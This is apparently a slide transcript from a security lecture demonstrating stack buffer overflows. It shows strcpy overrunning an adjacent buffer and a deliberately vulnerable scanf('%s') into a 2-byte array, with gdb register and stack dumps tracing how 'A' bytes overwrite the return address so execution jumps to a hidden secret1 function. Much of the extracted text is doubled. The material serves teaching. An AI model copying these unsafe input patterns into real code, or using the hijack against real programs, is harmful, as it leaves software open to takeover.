busted !. why security systems fail capability list
TRANSCRIPT
Busted !
Why Security Systems Fail
Capability ListCapability List
Access Control List
Access Control List
00 00 00 00 00 00 00 00 00 00 00 00
name[9]name[9]
00 …
degree[4]degree[4]
‘c’‘c’ ‘h’‘h’ ‘a’‘a’ ‘r’‘r’ ‘l’‘l’ ‘e’‘e’ ‘s’‘s’ 00 ‘P’‘P’ ‘h’‘h’ ‘D’‘D’ 00
strcpy(name,”charles”);strcpy(name,”charles”);
00
strcpy(degree,”PhD”);strcpy(degree,”PhD”);
00
…00
printf(name);printf(name);
printf(degree);printf(degree);
charlescharles
PhDPhD
‘c’‘c’ ‘h’‘h’ ‘a’‘a’ ‘r’‘r’ ‘l’‘l’ ‘e’‘e’ ‘t’‘t’ ‘o’‘o’ 00
strcpy(name,”charleton”);strcpy(name,”charleton”);
‘n’‘n’
…00
00 00 00 00 00 00 00 00 00 00 00 00
name[9]name[9]
00 …
degree[4]degree[4]
00
‘c’‘c’ ‘h’‘h’ ‘a’‘a’ ‘r’‘r’ ‘l’‘l’ ‘e’‘e’ ‘t’‘t’ ‘o’‘o’ ‘P’‘P’ ‘h’‘h’ ‘D’‘D’ 00‘n’‘n’
strcpy(degree,”PhD”);strcpy(degree,”PhD”);
…00
00 00 00
printf(name);printf(name);
printf(degree);printf(degree);
charletonPhDcharletonPhD
PhDPhD
#include <stdio.h> #include <stdlib.h> #include <string.h> void secret1(void) { puts("You found the secret function No. 1!\n"); } int main () { char string[2]; puts("Input: "); scanf("%s", string); printf("You entered %s.\n", string); return 0; }
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e52rbp 0x7fff5fbff828rsp 0x7fff5fbff818
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53rbp 0x7fff5fbff828rsp 0x7fff5fbff818
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53rbp 0x7fff5fbff828rsp 0x7fff5fbff828
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53rbp 0x7fff5fbff828rsp 0x7fff5fbff828
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
At startup of poof
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e53rbp 0x7fff5fbff828rsp 0x7fff5fbff818
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Before call to puts()
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e61rbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just inside of puts()
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000ea4rbp 0x7fff5fbff810rsp 0x7fff5fbff7f8
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just after return from puts()
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e66rbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just inside scanf( )
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e66 rsi 0x7fff5fbff800rbp 0x7fff5fbff810rsp 0x7fff5fbff7f8
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
After return from scanf ( )
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e7brbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
Just before stack cleanup
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e95rbp 0x7fff5fbff810rsp 0x7fff5fbff800
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
And ready to return to the operating system?
0x0000000100000e52 <main+0>: push %rbp /* entry to main() */0x0000000100000e53 <main+1>: mov %rsp,%rbp0x0000000100000e56 <main+4>: sub $0x10,%rsp0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi0x0000000100000e71 <main+31>: mov $0x0,%eax0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi0x0000000100000e86 <main+52>: mov $0x0,%eax0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */0x0000000100000e90 <main+62>: mov $0x0,%eax0x0000000100000e95 <main+67>: leaveq0x0000000100000e96 <main+68>: retq
rip 0x000100000e96rbp 0x414141414141rsp 0x7fff5fbff818
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
?
0x0000000100000e40 <secret1+0>: push %rbp 0x0000000100000e41 <secret1+1>: mov %rsp,%rbp 0x0000000100000e44 <secret1+4>: lea 0x65(%rip),%rdi # 0x100000eb0 0x0000000100000e4b <secret1+11>: callq 0x100000ea4 <dyld_stub_puts> 0x0000000100000e50 <secret1+16>: leaveq 0x0000000100000e51 <secret1+17>: retq
rip 0x000100000e40rbp 0x414141414141rsp 0x7fff5fbff818
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
